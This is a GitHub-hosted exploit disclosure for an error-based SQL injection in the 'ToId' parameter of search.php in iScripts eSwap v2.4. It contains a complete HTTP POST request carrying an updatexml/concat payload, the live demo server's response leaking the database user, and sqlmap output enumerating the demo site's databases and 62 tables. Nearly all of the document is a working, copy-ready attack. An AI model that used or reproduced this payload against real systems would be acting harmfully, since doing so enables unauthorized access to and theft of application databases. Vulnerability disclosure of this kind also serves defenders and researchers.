Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
138 lines (130 sloc) 4.45 KB

Exploit title: iScripts eSwap v2.4 - SQL injection via the search.php User Panel

Date: 23/05/2018

Exploit Author: Keyone

Vendor Homepage: https://www.iscripts.com

Software Link: https://www.iscripts.com/eswap

Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php

Version: 2.4

Tested on: Windows 7

Category: Webapps

CVE:


Description


iScripts eSwap v2.4 has SQL injection via the "search.php" function parameter in User Panel.

POC : 'ToId' parameter


Request:

POST /eswap/demo/search.php HTTP/1.1
Host: www.demo.iscripts.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=csv8f9jgmjl6sh1spblmikbra0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

btnGo=Send Message&btnSubAdd=1&qyery=txtHomeSearch=1&ToId=1' and (select updatexml(1,concat(0x2b,user()),1)) and '1'='1&txtMsg=1&txtMsg11=1&txtTitle=1&txtTitle11=Mr.

Response:

HTTP/1.1 200 OK
Date: Wed, 23 May 2018 01:56:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23892
...
</td>
    </tr>
</table>XPATH syntax error: '+productd_dmouser@localhost'

sqlmap:

[10:04:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[10:04:27] [INFO] fetching database names
[10:04:30] [INFO] used SQL query returns 2 entries
[10:04:31] [INFO] retrieved: information_schema
[10:04:31] [INFO] retrieved: productd_eswapdemo
available databases [2]:
[*] information_schema
[*] productd_eswapdemo
Database: productd_eswapdemo
[62 tables]
+---------------------------------+
| eswap_sliders                   |
| eswapaffiliate                  |
| eswapbanners                    |
| eswapbanners_lang               |
| eswapbatches                    |
| eswapcashtxn                    |
| eswapcategory                   |
| eswapcategory_lang              |
| eswapchat                       |
| eswapclient_module_category     |
| eswapcontent                    |
| eswapcontent_lang               |
| eswapcounteroffer               |
| eswapcreditpayments             |
| eswapescrowrangefee             |
| eswapfaq                        |
| eswapfaq_lang                   |
| eswapgallery                    |
| eswaphelp                       |
| eswaphelp_lang                  |
| eswaphelpcategory               |
| eswaphelpcategory_lang          |
| eswaplang                       |
| eswaplistingfee                 |
| eswaplookup                     |
| eswapmandatory                  |
| eswapmessages                   |
| eswapmetatags                   |
| eswapmetatags_lang              |
| eswaponline                     |
| eswappayment                    |
| eswappaymentdetails             |
| eswappins                       |
| eswapplan                       |
| eswapplan_lang                  |
| eswappointhistory               |
| eswapreferrals                  |
| eswapsale                       |
| eswapsaledetails                |
| eswapsaleextra                  |
| eswapsaleinter                  |
| eswapsaletemp                   |
| eswapsliders                    |
| eswapsmilies                    |
| eswapsuccessfee                 |
| eswapsuccesstransactionpayments |
| eswapsurveyquestions            |
| eswapswap                       |
| eswapswapinter                  |
| eswapswapreturn                 |
| eswapswaptemp                   |
| eswapswaptxn                    |
| eswapswaptxn_old                |
| eswaptempdata                   |
| eswapuser_devices               |
| eswapuser_referral              |
| eswapuser_sliders               |
| eswapusercredits                |
| eswapuserfeedback               |
| eswapusers                      |
| eswapusersinter                 |
| eswapuserstemp                  |
+---------------------------------+
You can’t perform that action at this time.